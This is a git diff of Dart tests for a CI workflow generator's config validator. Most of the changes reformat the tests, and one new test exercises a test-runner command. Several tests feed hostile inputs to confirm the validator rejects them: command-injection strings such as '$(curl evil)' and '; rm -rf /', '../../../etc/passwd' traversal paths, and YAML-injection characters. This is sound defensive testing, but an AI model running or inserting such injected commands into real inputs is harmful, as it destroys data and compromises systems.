+ await TestCommand.runWithRoot(tempDir.path); + }); + + test('uses passed repoRoot for log directory resolution', () async { + // Create minimal repo + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); + + await TestCommand.runWithRoot(tempDir.path); + + // Log dir should be under repoRoot when TEST_LOG_DIR is unset + final expectedLogDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect(Directory(expectedLogDir).existsSync(), isTrue); + }); + + test('runs root tests, writes results.json, and StepSummary pathway produces valid output', () async { + // Minimal repo with a passing test to exercise full TestCommand flow + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync(''' +name: ${config.repoName} +version: 0.0.0 +environment: + sdk: ^3.0.0 +dev_dependencies: + test: ^1.24.0 +'''); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File(p.join(tempDir.path, 'test', 'passing_test.dart')).writeAsStringSync(''' +import 'package:test/test.dart'; + +void main() { + test('passes', () => expect(1 + 1, equals(2))); +} +'''); + // Resolve dependencies so dart test can run + final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); + + await TestCommand.runWithRoot(tempDir.path); + + final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect(Directory(logDir).existsSync(), isTrue, reason: 'log dir should be created'); + + // results.json or expanded.txt are written by file reporters + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); + final hasResults = File(jsonPath).existsSync() || File(expandedPath).existsSync(); + expect(hasResults, isTrue, reason: 'at least one reporter output should exist'); + + // If results.json exists, verify parse + writeTestJobSummary pathway + if 
(File(jsonPath).existsSync()) { + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, greaterThanOrEqualTo(1)); + expect(results.failed, equals(0)); + + String? capturedSummary; + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'test-runner', + writeSummary: (m) => capturedSummary = m, + ); + expect(capturedSummary, isNotNull); + expect(capturedSummary!, contains('## Test Results — test-runner')); + expect(capturedSummary!, contains('passed')); + } + }); + }); +} diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index e00ed8e..a18f086 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -39,99 +39,65 @@ void main() { // ---- dart_sdk ---- group('dart_sdk', () { test('missing dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'features': {}}); expect(errors, contains('ci.dart_sdk is required')); }); test('null dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': null, - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': null, 'features': {}}); expect(errors, contains('ci.dart_sdk is required')); }); test('non-string dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': 42, - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': 42, 'features': {}}); expect(errors, anyElement(contains('must be a string'))); }); test('empty-string dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': '', 'features': {}}); expect(errors, anyElement(contains('non-empty'))); }); test('whitespace-only dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': ' 
', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': ' ', 'features': {}}); // After trim the string is empty expect(errors, anyElement(contains('non-empty'))); }); test('dart_sdk with leading/trailing whitespace produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': ' 3.9.2 ', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': ' 3.9.2 ', 'features': {}}); expect(errors, anyElement(contains('whitespace'))); }); test('dart_sdk with trailing newline triggers whitespace error', () { // A trailing \n makes trimmed != sdk, so the whitespace check fires first. - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9.2\n', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': '3.9.2\n', 'features': {}}); expect(errors, anyElement(contains('whitespace'))); }); - test( - 'dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', - () { - // A tab in the middle: trim() has no effect but the regex catches it. - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9\t.2', - 'features': {}, - }); - expect(errors, anyElement(contains('newlines/tabs'))); - }, - ); + test('dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', () { + // A tab in the middle: trim() has no effect but the regex catches it. 
+ final errors = WorkflowGenerator.validate({'dart_sdk': '3.9\t.2', 'features': {}}); + expect(errors, anyElement(contains('newlines/tabs'))); + }); test('valid semver dart_sdk passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: '3.9.2'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.9.2')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('valid semver with pre-release passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: '3.10.0-beta.1'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.10.0-beta.1')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "stable" passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: 'stable'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'stable')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "beta" passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: 'beta'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'beta')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); @@ -141,9 +107,7 @@ void main() { }); test('invalid dart_sdk like "latest" produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: 'latest'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'latest')); expect(errors, anyElement(contains('channel'))); }); @@ -161,10 +125,7 @@ void main() { }); test('non-map features produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9.2', - 'features': 'not_a_map', - }); + final errors = WorkflowGenerator.validate({'dart_sdk': '3.9.2', 'features': 'not_a_map'}); expect(errors, anyElement(contains('features must be an object'))); }); @@ -211,16 +172,12 @@ void main() { // ---- platforms ---- group('platforms', () { test('non-list 
platforms produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: null)..['platforms'] = 'ubuntu', - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: null)..['platforms'] = 'ubuntu'); expect(errors, anyElement(contains('platforms must be an array'))); }); test('unknown platform entry produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: ['ubuntu', 'solaris']), - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu', 'solaris'])); expect(errors, anyElement(contains('invalid platform "solaris"'))); }); @@ -232,16 +189,12 @@ void main() { }); test('valid single platform passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: ['ubuntu']), - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu'])); expect(errors.where((e) => e.contains('platforms')), isEmpty); }); test('valid multi-platform passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: ['ubuntu', 'macos', 'windows']), - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu', 'macos', 'windows'])); expect(errors.where((e) => e.contains('platforms')), isEmpty); }); @@ -266,58 +219,42 @@ void main() { }); test('valid secrets map passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'SOME_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'SOME_SECRET'})); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); test('secrets key with hyphen produces error (unsafe identifier)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API-KEY': 'SOME_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API-KEY': 'SOME_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets key starting with digit produces error', 
() { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'1API_KEY': 'SOME_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'1API_KEY': 'SOME_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets value with hyphen produces error (unsafe secret name)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'SOME-SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'SOME-SECRET'})); expect(errors, anyElement(contains('safe secret name'))); }); test('secrets key and value with underscore pass', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'MY_SECRET_NAME'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'MY_SECRET_NAME'})); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); test('secrets key with leading underscore produces error (must start with uppercase letter)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'_API_KEY': 'MY_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'_API_KEY': 'MY_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets key with lowercase produces error (uppercase only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'api_key': 'MY_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'api_key': 'MY_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets value with lowercase produces error (uppercase only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'my_secret'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'my_secret'})); expect(errors, anyElement(contains('safe secret name'))); }); }); @@ -338,55 +275,36 @@ void main() { test('valid 
pat passes', () { final errors = WorkflowGenerator.validate(_validConfig(pat: 'MY_PAT')); - expect( - errors.where((e) => e.contains('personal_access_token_secret')), - isEmpty, - ); + expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); }); test('null pat is fine (optional, defaults to GITHUB_TOKEN)', () { final errors = WorkflowGenerator.validate(_validConfig()); - expect( - errors.where((e) => e.contains('personal_access_token_secret')), - isEmpty, - ); + expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); }); test('pat with hyphen produces error (unsafe identifier)', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: 'MY-PAT'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: 'MY-PAT')); expect(errors, anyElement(contains('safe identifier'))); }); test('pat with special chars produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: r'MY_PAT$'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: r'MY_PAT$')); expect(errors, anyElement(contains('safe identifier'))); }); test('pat GITHUB_TOKEN passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: 'GITHUB_TOKEN'), - ); - expect( - errors.where((e) => e.contains('personal_access_token_secret')), - isEmpty, - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: 'GITHUB_TOKEN')); + expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); }); test('pat with leading underscore produces error (must start with uppercase letter)', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: '_MY_PAT'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: '_MY_PAT')); expect(errors, anyElement(contains('safe identifier'))); }); test('pat with lowercase produces error (uppercase only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: 'my_pat'), - ); + final errors = 
WorkflowGenerator.validate(_validConfig(pat: 'my_pat')); expect(errors, anyElement(contains('safe identifier'))); }); }); @@ -394,9 +312,7 @@ void main() { // ---- line_length ---- group('line_length', () { test('non-numeric line_length produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: true), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: true)); expect(errors, anyElement(contains('line_length'))); }); @@ -406,9 +322,7 @@ void main() { }); test('string line_length passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '120'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '120')); expect(errors.where((e) => e.contains('line_length')), isEmpty); }); @@ -418,52 +332,37 @@ void main() { }); test('string line_length "abc" produces error (must be digits only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: 'abc'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: 'abc')); expect(errors, anyElement(contains('digits only'))); }); test('string line_length "+120" produces error (digits only, no sign)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '+120'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '+120')); expect(errors, anyElement(contains('digits only'))); }); test('string line_length "-120" produces error (digits only, no sign)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '-120'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '-120')); expect(errors, anyElement(contains('digits only'))); }); - test('string line_length with leading/trailing whitespace produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: ' 120 '), - ); + test('string line_length with leading/trailing whitespace produces error', () { + final errors = 
WorkflowGenerator.validate(_validConfig(lineLength: ' 120 ')); expect(errors, anyElement(contains('whitespace'))); }); test('string line_length with embedded newline produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '12\n0'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '12\n0')); expect(errors, anyElement(contains('newlines or control'))); }); test('string line_length "0" produces error (out of range)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '0'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '0')); expect(errors, anyElement(contains('between 1 and 10000'))); }); test('string line_length "10001" produces error (out of range)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '10001'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '10001')); expect(errors, anyElement(contains('between 1 and 10000'))); }); @@ -473,9 +372,7 @@ void main() { }); test('int line_length 10001 produces error (out of range)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: 10001), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: 10001)); expect(errors, anyElement(contains('between 1 and 10000'))); }); }); @@ -490,13 +387,8 @@ void main() { }); test('sub_packages entry that is not a map produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: ['just_a_string']), - ); - expect( - errors, - anyElement(contains('sub_packages entries must be objects')), - ); + final errors = WorkflowGenerator.validate(_validConfig(subPackages: ['just_a_string'])); + expect(errors, anyElement(contains('sub_packages entries must be objects'))); }); test('sub_packages with missing name produces error', () { @@ -554,22 +446,16 @@ void main() { expect(errors, anyElement(contains('path must be a non-empty string'))); }); - test( - 
'sub_packages path with directory traversal (..) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': '../../../etc/passwd'}, - ], - ), - ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }, - ); + test('sub_packages path with directory traversal (..) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '../../../etc/passwd'}, + ], + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); test('sub_packages path with embedded traversal produces error', () { final errors = WorkflowGenerator.validate( @@ -579,10 +465,7 @@ void main() { ], ), ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); }); test('sub_packages absolute path produces error', () { @@ -651,19 +534,16 @@ void main() { expect(errors, anyElement(contains('unsupported characters'))); }); - test( - 'sub_packages path with leading/trailing whitespace produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': ' packages/foo '}, - ], - ), - ); - expect(errors, anyElement(contains('whitespace'))); - }, - ); + test('sub_packages path with leading/trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': ' packages/foo '}, + ], + ), + ); + expect(errors, anyElement(contains('whitespace'))); + }); test('sub_packages path with trailing tab triggers whitespace error', () { // Trailing \t means trimmed != value, so the whitespace check fires first. 
@@ -677,20 +557,17 @@ void main() { expect(errors, anyElement(contains('whitespace'))); }); - test( - 'sub_packages path with embedded tab triggers newlines/tabs error', - () { - // Embedded tab: trim() is identity, so newlines/tabs check catches it. - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': 'packages/f\too'}, - ], - ), - ); - expect(errors, anyElement(contains('newlines/tabs'))); - }, - ); + test('sub_packages path with embedded tab triggers newlines/tabs error', () { + // Embedded tab: trim() is identity, so newlines/tabs check catches it. + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/f\too'}, + ], + ), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }); test('sub_packages duplicate name produces error', () { final errors = WorkflowGenerator.validate( @@ -704,20 +581,17 @@ void main() { expect(errors, anyElement(contains('duplicate name "foo"'))); }); - test( - 'sub_packages duplicate path (after normalization) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': 'packages/foo'}, - {'name': 'bar', 'path': 'packages/./foo'}, - ], - ), - ); - expect(errors, anyElement(contains('duplicate path'))); - }, - ); + test('sub_packages duplicate path (after normalization) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo'}, + {'name': 'bar', 'path': 'packages/./foo'}, + ], + ), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); test('valid sub_packages passes', () { final errors = WorkflowGenerator.validate( @@ -743,73 +617,52 @@ void main() { final config = _validConfig(); config['runner_overrides'] = 'invalid'; final errors = WorkflowGenerator.validate(config); - expect( - errors, - anyElement(contains('runner_overrides must be an object')), - ); + 
expect(errors, anyElement(contains('runner_overrides must be an object'))); }); test('runner_overrides with invalid platform key produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'solaris': 'my-runner'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'solaris': 'my-runner'})); expect(errors, anyElement(contains('invalid platform key "solaris"'))); }); test('runner_overrides with empty string value produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': ''}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': ''})); expect(errors, anyElement(contains('must be a non-empty string'))); }); test('runner_overrides value with surrounding whitespace produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': ' custom-runner '}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': ' custom-runner '})); expect(errors, anyElement(contains('leading/trailing whitespace'))); }); test('valid runner_overrides passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'custom-runner-label'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'custom-runner-label'})); expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); }); test('runner_overrides value with newline produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'runner\nlabel'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'runner\nlabel'})); expect(errors, anyElement(contains('newlines, control chars'))); }); test('runner_overrides value with tab produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 
'runner\tlabel'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'runner\tlabel'})); expect(errors, anyElement(contains('newlines, control chars'))); }); test('runner_overrides value with YAML-injection char produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'runner:label'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'runner:label'})); expect(errors, anyElement(contains('unsafe YAML chars'))); }); test('runner_overrides value with dollar sign produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': r'runner$label'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': r'runner$label'})); expect(errors, anyElement(contains('unsafe YAML chars'))); }); test('runner_overrides value with hyphen and dot passes', () { final errors = WorkflowGenerator.validate( - _validConfig( - runnerOverrides: {'ubuntu': 'runtime-ubuntu-24.04-x64-256gb'}, - ), + _validConfig(runnerOverrides: {'ubuntu': 'runtime-ubuntu-24.04-x64-256gb'}), ); expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); }); @@ -830,68 +683,49 @@ void main() { }); test('web_test.concurrency non-int produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 'fast'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 'fast'})); expect(errors, anyElement(contains('concurrency must be an integer'))); }); test('web_test.concurrency zero produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 0}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 0})); expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency negative produces error', () { - final errors = 
WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': -1}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': -1})); expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency exceeds upper bound produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 33}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 33})); expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency double/float produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 3.14}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 3.14})); expect(errors, anyElement(contains('concurrency must be an integer'))); }); test('web_test.concurrency valid int passes', () { final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: {'concurrency': 4}, - ), + _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}, webTest: {'concurrency': 4}), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); test('web_test.concurrency at upper bound (32) passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 32}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 32})); expect(errors.where((e) => e.contains('concurrency')), isEmpty); }); test('web_test.concurrency null is fine (defaults to 1)', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {})); expect(errors.where((e) => e.contains('concurrency')), isEmpty); }); test('web_test.paths non-list produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'paths': 'not_a_list'}), 
- ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'paths': 'not_a_list'})); expect(errors, anyElement(contains('paths must be an array'))); }); @@ -925,57 +759,42 @@ void main() { }, ), ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }); - - test( - 'web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: { - 'paths': ['test/web/../../../etc/passwd'], - }, - ), - ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }, - ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); - test( - 'web_test.paths with shell metacharacters (\$(curl evil)) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - webTest: { - 'paths': [r'$(curl evil)'], - }, - ), - ); - expect(errors, anyElement(contains('unsupported characters'))); - }, - ); + test('web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/../../../etc/passwd'], + }, + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); - test( - 'web_test.paths with shell metacharacters (; rm -rf /) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - webTest: { - 'paths': ['; rm -rf /'], - }, - ), - ); - expect(errors, anyElement(contains('unsupported characters'))); - }, - ); + test('web_test.paths with shell metacharacters (\$(curl evil)) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': [r'$(curl evil)'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported 
characters'))); + }); + + test('web_test.paths with shell metacharacters (; rm -rf /) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['; rm -rf /'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); test('web_test.paths with single quote produces error', () { final errors = WorkflowGenerator.validate( @@ -1077,22 +896,16 @@ void main() { expect(errors, anyElement(contains('newlines/tabs'))); }); - test( - 'web_test.paths with embedded traversal that escapes repo produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - webTest: { - 'paths': ['test/../../../etc/passwd'], - }, - ), - ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }, - ); + test('web_test.paths with embedded traversal that escapes repo produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['test/../../../etc/passwd'], + }, + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); test('web_test.paths with embedded .. 
that stays in repo is fine', () { // test/web/../../etc/passwd normalizes to etc/passwd (still inside repo) @@ -1187,10 +1000,7 @@ void main() { test('empty web_test.paths list is fine', () { final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: {'paths': []}, - ), + _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}, webTest: {'paths': []}), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); @@ -1215,65 +1025,42 @@ void main() { expect(errors, anyElement(contains('unknown key "concurreny"'))); }); - test( - 'cross-validation: web_test config present but feature disabled produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': false}, - webTest: { - 'concurrency': 2, - 'paths': ['test/web/'], - }, - ), - ); - expect( - errors, - anyElement( - contains( - 'web_test config is present but ci.features.web_test is not enabled', - ), - ), - ); - }, - ); - - test( - 'cross-validation: web_test feature enabled but config wrong type produces error', - () { - final config = _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - ); - config['web_test'] = 'yes'; - final errors = WorkflowGenerator.validate(config); - expect(errors, anyElement(contains('web_test must be an object'))); - }, - ); + test('cross-validation: web_test config present but feature disabled produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': false}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), + ); + expect(errors, anyElement(contains('web_test config is present but ci.features.web_test is not enabled'))); + }); - test( - 'cross-validation: web_test feature enabled with no config object (null) is allowed, uses defaults', - () { - final errors = WorkflowGenerator.validate( - 
_validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - // webTest: null (omitted) — config is optional when feature is enabled - ), - ); - expect(errors.where((e) => e.contains('web_test')), isEmpty); - }, - ); + test('cross-validation: web_test feature enabled but config wrong type produces error', () { + final config = _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}); + config['web_test'] = 'yes'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }); - test( - 'cross-validation: web_test feature enabled with explicit null config is allowed', - () { - final config = _validConfig( + test('cross-validation: web_test feature enabled with no config object (null) is allowed, uses defaults', () { + final errors = WorkflowGenerator.validate( + _validConfig( features: {'proto': false, 'lfs': false, 'web_test': true}, - ); - config['web_test'] = null; - final errors = WorkflowGenerator.validate(config); - expect(errors.where((e) => e.contains('web_test')), isEmpty); - }, - ); + // webTest: null (omitted) — config is optional when feature is enabled + ), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('cross-validation: web_test feature enabled with explicit null config is allowed', () { + final config = _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}); + config['web_test'] = null; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); }); // ---- fully valid config produces no errors ---- @@ -1331,9 +1118,7 @@ void main() { test('returns null when config.json exists but has no "ci" key', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'repo_name': 'test_repo'})); + 
